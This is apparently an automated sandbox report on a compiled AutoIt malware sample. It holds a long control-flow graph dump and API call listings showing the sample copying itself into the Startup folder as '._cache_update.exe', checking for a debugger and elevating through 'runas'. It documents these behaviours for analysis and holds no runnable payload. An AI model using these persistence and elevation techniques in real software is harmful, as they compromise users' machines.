87459->87458 87461 123bcf 48 API calls 87459->87461 87460->87458 87460->87459 87462 166df7 _wcsrchr 87461->87462 87462->87458 87463 166d6d 48 API calls 87462->87463 87464 166e1b 87463->87464 87464->87458 87465 166e28 CreateDirectoryW 87464->87465 87465->87458 87467 12cdc5 87466->87467 87468 
12cdca 87466->87468 87467->87468 87533 142241 48 API calls 87467->87533 87468->87307 87470 12ce07 87470->87307 87472 12e216 87471->87472 87507 12e226 Mailbox 87471->87507 87474 12e670 87472->87474 87472->87507 87473 16d520 85 API calls 87473->87507 87602 13ecee 401 API calls 87474->87602 87476 12e4fd 87476->87082 87478 12e681 87478->87476 87480 12e68e 87478->87480 87479 12e26c PeekMessageW 87479->87507 87604 13ec33 401 API calls Mailbox 87480->87604 87482 195b13 Sleep 87482->87507 87483 12e695 LockWindowUpdate DestroyWindow GetMessageW 87483->87476 87486 12e6c7 87483->87486 87484 12e4e7 87484->87476 87603 12322e 16 API calls 87484->87603 87489 13cf79 49 API calls 87489->87507 87491 12e657 PeekMessageW 87491->87507 87492 14010a 48 API calls 87492->87507 87493 12e517 timeGetTime 87493->87507 87495 12c935 48 API calls 87495->87507 87496 195dfc WaitForSingleObject 87499 195e19 GetExitCodeProcess CloseHandle 87496->87499 87496->87507 87497 12e641 TranslateMessage DispatchMessageW 87497->87491 87498 196147 Sleep 87520 195cce Mailbox 87498->87520 87499->87507 87500 12d3d2 48 API calls 87500->87520 87501 12e6cc timeGetTime 87605 13cf79 49 API calls 87501->87605 87502 195feb Sleep 87502->87507 87507->87473 87507->87479 87507->87482 87507->87484 87507->87489 87507->87491 87507->87492 87507->87493 87507->87495 87507->87496 87507->87497 87507->87498 87507->87501 87507->87502 87511 121000 377 API calls 87507->87511 87512 195cea Sleep 87507->87512 87517 121dce 106 API calls 87507->87517 87507->87520 87525 12fa40 377 API calls 87507->87525 87528 1344e0 377 API calls 87507->87528 87529 133680 377 API calls 87507->87529 87531 12caee 48 API calls 87507->87531 87532 12d380 55 API calls 87507->87532 87534 12e7e0 87507->87534 87541 12ea00 87507->87541 87591 13f381 87507->87591 87596 13ed1a 87507->87596 87601 12e7b0 401 API calls Mailbox 87507->87601 87606 188b20 48 API calls 87507->87606 87614 13e3a5 timeGetTime 87507->87614 87509 1961de GetExitCodeProcess 87513 19620a CloseHandle 
87509->87513 87514 1961f4 WaitForSingleObject 87509->87514 87511->87507 87512->87507 87513->87520 87514->87507 87514->87513 87515 195cd7 Sleep 87515->87512 87516 188a48 107 API calls 87516->87520 87517->87507 87519 196266 Sleep 87519->87507 87520->87500 87520->87507 87520->87509 87520->87512 87520->87515 87520->87516 87520->87519 87523 12caee 48 API calls 87520->87523 87607 1656dc 49 API calls Mailbox 87520->87607 87608 13cf79 49 API calls 87520->87608 87609 12d380 87520->87609 87613 121000 401 API calls 87520->87613 87615 17d12a 50 API calls 87520->87615 87616 168355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 87520->87616 87617 13e3a5 timeGetTime 87520->87617 87618 166f5b CreateToolhelp32Snapshot Process32FirstW 87520->87618 87523->87520 87525->87507 87528->87507 87529->87507 87531->87507 87532->87507 87533->87470 87535 12e80f 87534->87535 87536 12e7fd 87534->87536 87656 16d520 85 API calls 4 library calls 87535->87656 87625 12dcd0 87536->87625 87538 12e806 87538->87507 87540 1998e8 87540->87540 87542 12ea20 87541->87542 87543 12fa40 401 API calls 87542->87543 87546 12ea89 87542->87546 87545 199919 87543->87545 87544 1999bc 87671 16d520 85 API calls 4 library calls 87544->87671 87545->87546 87668 16d520 85 API calls 4 library calls 87545->87668 87551 12d3d2 48 API calls 87546->87551 87572 12eb18 87546->87572 87574 12ecd7 Mailbox 87546->87574 87549 12d3d2 48 API calls 87550 199997 87549->87550 87670 141b2a 52 API calls __cinit 87550->87670 87552 199963 87551->87552 87669 141b2a 52 API calls __cinit 87552->87669 87555 12d380 55 API calls 87555->87574 87557 199d70 87680 17e2fb 401 API calls Mailbox 87557->87680 87558 199e49 87685 16d520 85 API calls 4 library calls 87558->87685 87559 16d520 85 API calls 87559->87574 87560 199dc2 87682 16d520 85 API calls 4 library calls 87560->87682 87561 199ddf 87683 17c235 401 API calls Mailbox 87561->87683 87563 12fa40 401 API calls 87563->87574 87567 12342c 48 API calls 87567->87574 
87570 199df7 87590 12ef0c Mailbox 87570->87590 87684 16d520 85 API calls 4 library calls 87570->87684 87571 1314a0 48 API calls 87571->87574 87572->87549 87572->87574 87574->87544 87574->87555 87574->87557 87574->87558 87574->87559 87574->87560 87574->87561 87574->87563 87574->87567 87574->87571 87575 12f56f 87574->87575 87578 199a3c 87574->87578 87574->87590 87664 12d805 87574->87664 87672 16a3ee 48 API calls 87574->87672 87673 17ede9 401 API calls 87574->87673 87678 15a599 InterlockedDecrement 87574->87678 87679 17f4df 401 API calls 87574->87679 87575->87590 87681 16d520 85 API calls 4 library calls 87575->87681 87674 17d154 48 API calls 87578->87674 87580 199a48 87582 199a56 87580->87582 87583 199a9b 87580->87583 87590->87507 87592 13f390 87591->87592 87593 19ee11 87591->87593 87592->87507 87594 19ee46 87593->87594 87595 19ee28 TranslateAcceleratorW 87593->87595 87595->87592 87597 13ed2c 87596->87597 87600 13ed34 87596->87600 87597->87507 87598 13ed5e IsDialogMessageW 87598->87597 87598->87600 87599 19ebec GetClassLongW 87599->87598 87599->87600 87600->87597 87600->87598 87600->87599 87601->87507 87602->87484 87603->87478 87604->87483 87605->87507 87606->87507 87607->87520 87608->87520 87610 12d38b 87609->87610 87611 12d3b4 87610->87611 87686 12d772 55 API calls 87610->87686 87611->87520 87613->87520 87614->87507 87615->87520 87616->87520 87617->87520 87687 1679c2 87618->87687 87620 166fa4 Process32NextW 87621 167021 CloseHandle 87620->87621 87623 166fa0 _wcscat 87620->87623 87621->87520 87623->87620 87623->87621 87693 14297d 87623->87693 87696 141bc7 87623->87696 87626 12fa40 401 API calls 87625->87626 87638 12dd0f _memmove 87626->87638 87627 198dbe 87663 16d520 85 API calls 4 library calls 87627->87663 87629 198ddc 87629->87629 87630 12dd70 87630->87538 87631 12e12b Mailbox 87635 14010a 48 API calls 87631->87635 87632 12e051 87633 12e066 87632->87633 87634 198daf 87632->87634 87646 12decb _memmove 87635->87646 87638->87627 87638->87630 87638->87631 87639 
14010a 48 API calls 87638->87639 87640 12deb7 87638->87640 87649 12df29 87638->87649 87639->87638 87640->87631 87642 12dec4 87640->87642 87645 14010a 48 API calls 87642->87645 87644 198d9e 87661 16d520 85 API calls 4 library calls 87644->87661 87645->87646 87646->87649 87649->87632 87649->87644 87651 12df64 87649->87651 87652 198d76 87649->87652 87654 198d51 87649->87654 87658 125322 401 API calls 87649->87658 87651->87538 87660 16d520 85 API calls 4 library calls 87652->87660 87659 16d520 85 API calls 4 library calls 87654->87659 87656->87540 87658->87649 87659->87651 87660->87651 87661->87651 87663->87629 87665 12d828 _memmove 87664->87665 87666 12d815 87664->87666 87665->87574 87666->87665 87667 14010a 48 API calls 87666->87667 87667->87665 87668->87546 87669->87572 87670->87574 87671->87590 87672->87574 87673->87574 87674->87580 87678->87574 87679->87574 87680->87575 87681->87590 87682->87590 87683->87570 87684->87590 87685->87590 87686->87611 87688 1679e9 87687->87688 87692 1679d0 87687->87692 87707 14224a 58 API calls __wcstoi64 87688->87707 87691 1679ef 87691->87623 87692->87688 87692->87691 87706 1422df GetStringTypeW wcstoxq 87692->87706 87708 1429c7 87693->87708 87697 141bd3 87696->87697 87698 141c48 87696->87698 87706->87692 87707->87691 87738 172306 87737->87738 87739 172365 87738->87739 87740 17230a 87738->87740 87806 13f0f3 48 API calls 87739->87806 87741 14010a 48 API calls 87740->87741 87743 172311 87741->87743 87744 17231f 87743->87744 87793 125080 49 API calls 87743->87793 87746 1284a6 80 API calls 87744->87746 87748 172331 87746->87748 87747 172379 87749 17234d 87747->87749 87751 17243f 87747->87751 87753 1723bb 87747->87753 87794 124bf9 87748->87794 87749->87327 87754 16be47 50 API calls 87751->87754 87756 1284a6 80 API calls 87753->87756 87757 172446 87754->87757 87764 1723c2 87756->87764 87809 16689f SetFilePointerEx SetFilePointerEx WriteFile 87757->87809 87759 1723f6 87775 1667dc 87759->87775 87761 172400 87807 127b6e 48 API calls 
87761->87807 87764->87759 87764->87761 87765 172410 87766 12c935 48 API calls 87765->87766 87767 17241a 87766->87767 87808 1239e8 48 API calls 2 library calls 87767->87808 87769 1723fe Mailbox 87769->87749 87771 1250ec CloseHandle 87769->87771 87770 172428 87772 1667dc 55 API calls 87770->87772 87773 172490 87771->87773 87772->87769 87810 124592 CloseHandle 87773->87810 87776 1667f6 87775->87776 87777 1667ec 87775->87777 87779 1667fc 87776->87779 87780 166808 87776->87780 87827 166917 SetFilePointerEx SetFilePointerEx WriteFile 87777->87827 87828 1668b9 51 API calls 87779->87828 87782 166824 87780->87782 87783 166811 87780->87783 87811 12a6d4 87782->87811 87785 12a6d4 48 API calls 87783->87785 87788 166816 87785->87788 87787 1667f4 Mailbox 87787->87769 87829 1666f8 50 API calls 87788->87829 87793->87744 87795 1250ec CloseHandle 87794->87795 87796 124c04 87795->87796 87867 124b88 87796->87867 87799 124c44 87799->87747 87806->87747 87807->87765 87808->87770 87809->87769 87810->87749 87812 14010a 48 API calls 87811->87812 87813 12a6e7 87812->87813 87827->87787 87828->87787 87868 124ba1 CreateFileW 87867->87868 87869 194957 87867->87869 87872 124bc3 87868->87872 87870 19495d CreateFileW 87869->87870 87869->87872 87871 194983 87870->87871 87870->87872 87872->87799 87874 124df0 87872->87874 87876 124e10 87874->87876 87922 127e53 48 API calls 87921->87922 87923 1678df 87922->87923 87935 13e617 87923->87935 87926 17267a 87927 1726a4 __wsetenvp 87926->87927 87928 172763 87927->87928 87929 1726d8 87927->87929 87932 16f039 87927->87932 87928->87932 87940 13dfd2 60 API calls 87928->87940 87929->87932 87939 13dfd2 60 API calls 87929->87939 87932->87335 87933 1239e8 48 API calls 2 library calls 87932->87933 87933->87335 87936 13e625 87935->87936 87937 12a2fb 48 API calls 87936->87937 87938 13e635 87937->87938 87938->87926 87939->87929 87940->87928 87942 12c4cd 48 API calls 87941->87942 87943 183d89 87942->87943 87944 12c4cd 48 API calls 87943->87944 87945 183d91 87944->87945 
87946 12c4cd 48 API calls 87945->87946 87947 183d99 87946->87947 87948 183e01 87947->87948 87988 12a4f6 87947->87988 87999 12a9af 87998->87999 88002 12a9ca 87998->88002 88000 12b8a7 48 API calls 87999->88000 88001 12a9b7 CharUpperBuffW 88000->88001 88001->88002 88002->87102 88004 194c5a 88003->88004 88005 1210f9 88003->88005 88006 14010a 48 API calls 88005->88006 88008 121100 88006->88008 88007 121121 88007->87125 88008->88007 88037 12113c 48 API calls 88008->88037 88010->87109 88011->87161 88012->87161 88013->87161 88014->87169 88015->87109 88017 12d30a 88016->88017 88018 12d2df 88016->88018 88017->87127 88017->87128 88021 12d2e6 88018->88021 88039 12d349 53 API calls 88018->88039 88021->88017 88038 12d349 53 API calls 88021->88038 88022->87163 88023->87153 88024->87153 88025->87111 88026->87163 88027->87139 88028->87163 88029->87163 88030->87163 88031->87161 88032->87161 88033->87161 88034->87163 88035->87158 88036->87163 88037->88007 88038->88017 88039->88021 88040->87184 88041->87184 88042->86675 88043->86675 88044->86675 88045->86675 88046->86675 88047->86671 88048->86667 88049->86642 88050->86646 88051->86653 88052->86661 88054 1284a6 80 API calls 88053->88054 88055 17f7db 88054->88055 88056 17f81d Mailbox 88055->88056 88089 180458 88055->88089 88056->86696 88058 17fa7c 88059 17fbeb 88058->88059 88063 17fa86 88058->88063 88135 180579 88 API calls Mailbox 88059->88135 88062 17fbf8 88062->88063 88064 17fc04 88062->88064 88102 17f5fb 88063->88102 88064->88056 88065 1284a6 80 API calls 88082 17f875 Mailbox 88065->88082 88070 17faba 88116 13f92c 88070->88116 88073 17fad4 88122 16d520 85 API calls 4 library calls 88073->88122 88074 17faee 88123 123320 88074->88123 88077 17fadf GetCurrentProcess TerminateProcess 88077->88074 88078 17fb05 88079 1314a0 48 API calls 88078->88079 88088 17fb2f 88078->88088 88081 17fb1e 88079->88081 88080 17fc56 88080->88056 88085 17fc6f FreeLibrary 88080->88085 88134 180300 104 API calls _free 88081->88134 88082->88056 88082->88058 
88082->88065 88082->88082 88120 1828d9 48 API calls _memmove 88082->88120 88121 17fc96 60 API calls 2 library calls 88082->88121 88084 1314a0 48 API calls 88084->88088 88085->88056 88087 12d89e 50 API calls 88087->88088 88088->88080 88088->88084 88088->88087 88136 180300 104 API calls _free 88088->88136 88090 12b8a7 48 API calls 88089->88090 88091 180473 CharLowerBuffW 88090->88091 88092 17267a 60 API calls 88091->88092 88093 180494 88092->88093 88095 12d3d2 48 API calls 88093->88095 88101 1804cf Mailbox 88093->88101 88096 1804ac 88095->88096 88097 127f40 48 API calls 88096->88097 88098 1804c3 88097->88098 88100 12a2fb 48 API calls 88098->88100 88099 18050b Mailbox 88099->88082 88100->88101 88101->88099 88137 17fc96 60 API calls 2 library calls 88101->88137 88103 17f616 88102->88103 88104 17f66b 88102->88104 88105 14010a 48 API calls 88103->88105 88108 180719 88104->88108 88107 17f638 88105->88107 88106 14010a 48 API calls 88106->88107 88107->88104 88107->88106 88109 180944 Mailbox 88108->88109 88115 18073c _strcat _wcscpy __wsetenvp 88108->88115 88109->88070 88110 12d00b 58 API calls 88110->88115 88111 12cdb4 48 API calls 88111->88115 88112 1284a6 80 API calls 88112->88115 88113 1445ec 47 API calls __crtGetStringTypeA_stat 88113->88115 88115->88109 88115->88110 88115->88111 88115->88112 88115->88113 88138 168932 50 API calls __wsetenvp 88115->88138 88117 13f941 88116->88117 88118 13f9d9 select 88117->88118 88119 13f9a7 88117->88119 88118->88119 88119->88073 88119->88074 88120->88082 88121->88082 88122->88077 88124 123334 88123->88124 88125 123339 Mailbox 88123->88125 88139 12342c 48 API calls 88124->88139 88132 123347 88125->88132 88140 12346e 48 API calls 88125->88140 88128 14010a 48 API calls 88130 1233d8 88128->88130 88129 123422 88129->88078 88131 14010a 48 API calls 88130->88131 88133 1233e3 88131->88133 88132->88128 88132->88129 88133->88078 88134->88088 88135->88062 88136->88088 88137->88099 88138->88115 88139->88125 88140->88132 88142 176b25 GetWindowRect 
88141->88142 88143 176b42 88141->88143 88144 176b5c 88142->88144 88143->88144 88145 176b52 ClientToScreen 88143->88145 88144->86705 88144->86708 88145->88144 88146->86711 88147->86715 88156 17ae3b 88148->88156 88151 17ad05 Mailbox 88152 17ad31 htons 88151->88152 88153 17ad1b 88151->88153 88152->88153 88153->86722 88155 16d7f2 88154->88155 88155->86729 88157 12a6d4 48 API calls 88156->88157 88158 17ae49 88157->88158 88161 17ae79 WideCharToMultiByte 88158->88161 88160 17acf3 inet_addr 88160->88151 88162 17aea7 88161->88162 88163 17ae9d 88161->88163 88165 14010a 48 API calls 88162->88165 88164 13f324 48 API calls 88163->88164 88168 17aea5 88164->88168 88166 17aeae WideCharToMultiByte 88165->88166 88167 13f2d0 48 API calls 88166->88167 88167->88168 88168->88160 88169->86738 88171 121990 88170->88171 88175 1219af _memmove 88170->88175 88173 14010a 48 API calls 88171->88173 88172 14010a 48 API calls 88174 1219c6 88172->88174 88173->88175 88174->86767 88175->88172 88176->86750 88177->86758 88178->86759 88180 1823eb _memset 88179->88180 88181 182428 88180->88181 88182 182452 88180->88182 88183 12cdb4 48 API calls 88181->88183 88186 12cdb4 48 API calls 88182->88186 88187 182476 88182->88187 88184 182433 88183->88184 88184->88187 88190 12cdb4 48 API calls 88184->88190 88185 1824b0 88189 1284a6 80 API calls 88185->88189 88188 182448 88186->88188 88187->88185 88191 12cdb4 48 API calls 88187->88191 88193 12cdb4 48 API calls 88188->88193 88192 1824d4 88189->88192 88190->88188 88191->88185 88194 123bcf 48 API calls 88192->88194 88193->88187 88195 1824de 88194->88195 88196 1824e8 88195->88196 88197 1825a1 88195->88197 88198 1284a6 80 API calls 88196->88198 88199 1825d3 GetCurrentDirectoryW 88197->88199 88202 1284a6 80 API calls 88197->88202 88200 1824f9 88198->88200 88201 14010a 48 API calls 88199->88201 88203 123bcf 48 API calls 88200->88203 88204 1825f8 GetCurrentDirectoryW 88201->88204 88205 1825b8 88202->88205 88207 182503 88203->88207 88208 182605 88204->88208 88206 123bcf 48 
API calls 88205->88206 88209 1825c2 __wsetenvp 88206->88209 88210 1284a6 80 API calls 88207->88210 88213 12ca8e 48 API calls 88208->88213 88217 18263e 88208->88217 88209->88199 88209->88217 88211 182514 88210->88211 88212 123bcf 48 API calls 88211->88212 88214 18251e 88212->88214 88215 18261e 88213->88215 88218 1284a6 80 API calls 88214->88218 88219 12ca8e 48 API calls 88215->88219 88216 18268a 88224 18274c CreateProcessW 88216->88224 88225 1826c1 88216->88225 88217->88216 88257 16a17a 7 API calls 88217->88257 88221 18252f 88218->88221 88222 18262e 88219->88222 88226 123bcf 48 API calls 88221->88226 88227 12ca8e 48 API calls 88222->88227 88223 182655 88258 16a073 7 API calls 88223->88258 88237 18276b 88224->88237 88260 15bc90 69 API calls 88225->88260 88228 182539 88226->88228 88227->88217 88231 18256f GetSystemDirectoryW 88228->88231 88233 1284a6 80 API calls 88228->88233 88235 14010a 48 API calls 88231->88235 88232 182670 88259 16a102 7 API calls 88232->88259 88236 182550 88233->88236 88238 182594 GetSystemDirectoryW 88235->88238 88239 123bcf 48 API calls 88236->88239 88241 1827bd CloseHandle 88237->88241 88242 182780 88237->88242 88238->88208 88240 18255a __wsetenvp 88239->88240 88240->88208 88240->88231 88243 1827cb 88241->88243 88250 1827f5 88241->88250 88246 182791 GetLastError 88242->88246 88261 169d09 CloseHandle Mailbox 88243->88261 88245 1827fb 88248 1827a5 88245->88248 88246->88248 88262 169b29 CloseHandle 88248->88262 88250->88245 88253 182827 CloseHandle 88250->88253 88253->88248 88254 181f2b 88254->86547 88256 1826df __wsetenvp 88256->88237 88257->88223 88258->88232 88259->88216 88260->88256 88262->88254 88264 12d89e 50 API calls 88263->88264 88265 121a08 88264->88265 88266 121a12 88265->88266 88267 19db7d 88265->88267 88268 1284a6 80 API calls 88266->88268 88269 127e53 48 API calls 88267->88269 88270 121a1f 88268->88270 88271 19db8d 88269->88271 88272 12c935 48 API calls 88270->88272 88271->88271 88273 121a2d 88272->88273 88274 121dce 88273->88274 

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0012376D
                                                                                                                                                            • Part of subcall function 00124257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,00000000,00000001,00000000), ref: 0012428C
                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?), ref: 0012377F
                                                                                                                                                          • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,001E1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,001E1124,?,?), ref: 001237EE
                                                                                                                                                            • Part of subcall function 001234F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0012352A
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00123860
                                                                                                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,001D2934,00000010), ref: 001921C5
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?), ref: 001921FD
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00192232
                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001BDAA4), ref: 00192290
                                                                                                                                                          • ShellExecuteW.SHELL32(00000000), ref: 00192297
                                                                                                                                                            • Part of subcall function 001230A5: GetSysColorBrush.USER32(0000000F), ref: 001230B0
                                                                                                                                                            • Part of subcall function 001230A5: LoadCursorW.USER32(00000000,00007F00), ref: 001230BF
                                                                                                                                                            • Part of subcall function 001230A5: LoadIconW.USER32(00000063), ref: 001230D5
                                                                                                                                                            • Part of subcall function 001230A5: LoadIconW.USER32(000000A4), ref: 001230E7
                                                                                                                                                            • Part of subcall function 001230A5: LoadIconW.USER32(000000A2), ref: 001230F9
                                                                                                                                                            • Part of subcall function 001230A5: RegisterClassExW.USER32(?), ref: 00123167
                                                                                                                                                            • Part of subcall function 00122E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00122ECB
                                                                                                                                                            • Part of subcall function 00122E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00122EEC
                                                                                                                                                            • Part of subcall function 00122E9D: ShowWindow.USER32(00000000), ref: 00122F00
                                                                                                                                                            • Part of subcall function 00122E9D: ShowWindow.USER32(00000000), ref: 00122F09
                                                                                                                                                            • Part of subcall function 00123598: _memset.LIBCMT ref: 001235BE
                                                                                                                                                            • Part of subcall function 00123598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00123667
                                                                                                                                                          Strings
                                                                                                                                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 001921BE
                                                                                                                                                          • runas, xrefs: 0019228B
                                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, xrefs: 001237B4, 001237E9, 001237FD, 00192257
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                          • API String ID: 4253510256-2243176362
                                                                                                                                                          • Opcode ID: d429658b6ae94b0a66eeb3d20038a12579a6e102b1de3a62b8ddb94c0ac4320b
                                                                                                                                                          • Instruction ID: c107870065286305200cff500cdf224f67488c3609f6a2d5906c5fd56acbc97c
                                                                                                                                                          • Opcode Fuzzy Hash: d429658b6ae94b0a66eeb3d20038a12579a6e102b1de3a62b8ddb94c0ac4320b
                                                                                                                                                          • Instruction Fuzzy Hash: 87514970644294BBCF14ABF0FC86FED3B78AB26704F000166F7529A5A1D7744AD4DB22

                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00122A33
                                                                                                                                                          • KillTimer.USER32(?,00000001), ref: 00122A5D
                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00122A80
                                                                                                                                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00122A8B
                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00122A9F
                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00122AAE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                                          • String ID: TaskbarCreated
                                                                                                                                                          • API String ID: 157504867-2362178303
                                                                                                                                                          • Opcode ID: 70550873b091b1728f127c580b6d5be3529fcbca7571b8c1454c63b8b787dc1b
                                                                                                                                                          • Instruction ID: da5b1552bfe77717d596a113746ec35c402c925a9a7c5a2236ce49a646fc201a
                                                                                                                                                          • Opcode Fuzzy Hash: 70550873b091b1728f127c580b6d5be3529fcbca7571b8c1454c63b8b787dc1b
                                                                                                                                                          • Instruction Fuzzy Hash: FD41F5312106A9BBDB38AFA8BC49BBD3659F729340F040225F50797DA1DBB49DE08761

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00183AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182AA6,?,?), ref: 00183B0E
                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0018317F
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                          • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0018321E
                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 001832B6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 658460102-0
                                                                                                                                                          • Opcode ID: 09e028a39df6f9d4e1dd662cd8fc63a19c8fab3c2655ea6b4486df787ef87e78
                                                                                                                                                          • Instruction ID: 8ddf63e95f71e168e7f9e5408529e112223198fd7ce635dbf64a9e396d5987fc
                                                                                                                                                          • Opcode Fuzzy Hash: 09e028a39df6f9d4e1dd662cd8fc63a19c8fab3c2655ea6b4486df787ef87e78
                                                                                                                                                          • Instruction Fuzzy Hash: 3AE16C71204210AFCB15EF28D995E2BBBE8EF89714B08856DF45ADB261DB30EE01CF51
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersionExW.KERNEL32(?,00000000), ref: 0013E4A7
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,001BDC28,?,?), ref: 0013E567
                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,001BDC28,?,?), ref: 0013E5BC
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013E5C7
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0013E5DA
                                                                                                                                                          • GetSystemInfo.KERNEL32(?,001BDC28,?,?), ref: 0013E5E4
                                                                                                                                                          • GetSystemInfo.KERNEL32(?,001BDC28,?,?), ref: 0013E5F0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2717633055-0
                                                                                                                                                          • Opcode ID: 08b4119ef3f32581e24cbed166862f619dc8cbf5e5913eafb4ac209565695c76
                                                                                                                                                          • Instruction ID: 4652b86e1a175fc55d3dba1bb3880828481020aba91201e17aac2eb5e6b86e57
                                                                                                                                                          • Opcode Fuzzy Hash: 08b4119ef3f32581e24cbed166862f619dc8cbf5e5913eafb4ac209565695c76
                                                                                                                                                          • Instruction Fuzzy Hash: 9961E0B590A390DBCF15CF6898C11E97FA46F3A304F1A45D8D849AB287D734C948CF66
                                                                                                                                                          APIs
                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00123202
                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00123219
                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 001957D7
                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 001957EC
                                                                                                                                                          • LockResource.KERNEL32(?), ref: 001957FF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
